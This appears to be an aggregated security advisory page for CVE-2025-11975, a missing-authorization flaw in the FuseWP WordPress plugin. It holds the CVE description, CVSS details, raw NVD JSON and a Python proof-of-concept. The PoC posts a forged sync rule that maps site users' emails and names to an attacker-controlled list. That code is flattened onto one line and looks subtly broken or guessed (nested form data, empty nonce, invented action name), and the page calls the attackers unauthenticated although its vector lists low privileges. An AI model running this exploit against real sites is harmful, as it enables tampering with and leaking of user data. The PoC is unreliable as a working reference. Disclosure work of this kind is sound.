Security Vulnerability Report
δΈ­ζ–‡
CVE-2025-11975 CVSS 4.3 MEDIUM

CVE-2025-11975

Published: 2025-10-31 03:15:35
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The FuseWP – WordPress User Sync to Email List & Marketing Automation (Mailchimp, Constant Contact, ActiveCampaign etc.) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_changes() function in all versions up to, and including, 1.1.23.0. This makes it possible for unauthenticated attackers to add and edit sync rules.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

FuseWP WordPress Plugin <= 1.1.23.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-11975 PoC - Missing Authorization in FuseWP save_changes() # Target: WordPress site with FuseWP plugin <= 1.1.23.0 target_url = "http://target-wordpress-site.com" # Step 1: Identify the vulnerable endpoint # The save_changes() function is hooked to admin_init action # Attack requires sending a POST request to wp-admin/admin.php?page=fusewp-sync endpoint = f"{target_url}/wp-admin/admin.php?page=fusewp-sync" # Step 2: Construct malicious sync rule payload payload = { "action": "fusewp_save_sync_rule", "nonce": "", # Nonce not properly validated for unauthenticated users "sync_rule": { "name": "Malicious Sync Rule", "source": "wp_users", "destination": "attacker_controlled_list", "field_mapping": { "email": "{user_email}", "name": "{user_display_name}" } } } # Step 3: Send unauthorized request to create/modify sync rules headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } response = requests.post(endpoint, data=payload, headers=headers) # Step 4: Verify if sync rule was created if response.status_code == 200: print("[+] Sync rule created/modified successfully") print(f"[+] Response: {response.text}") else: print("[-] Attack failed") # Note: This PoC demonstrates the missing authorization vulnerability. # An attacker can modify sync rules without authentication.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11975", "sourceIdentifier": "[email protected]", "published": "2025-10-31T03:15:34.937", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The FuseWP – WordPress User Sync to Email List & Marketing Automation (Mailchimp, Constant Contact, ActiveCampaign etc.) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_changes() function in all versions up to, and including, 1.1.23.0. This makes it possible for unauthenticated attackers to add and edit sync rules."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3383939/fusewp/trunk/src/core/src/Admin/SettingsPage/SyncPage.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6c68e8a1-926f-497f-b9f2-b0a67cd09adf?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.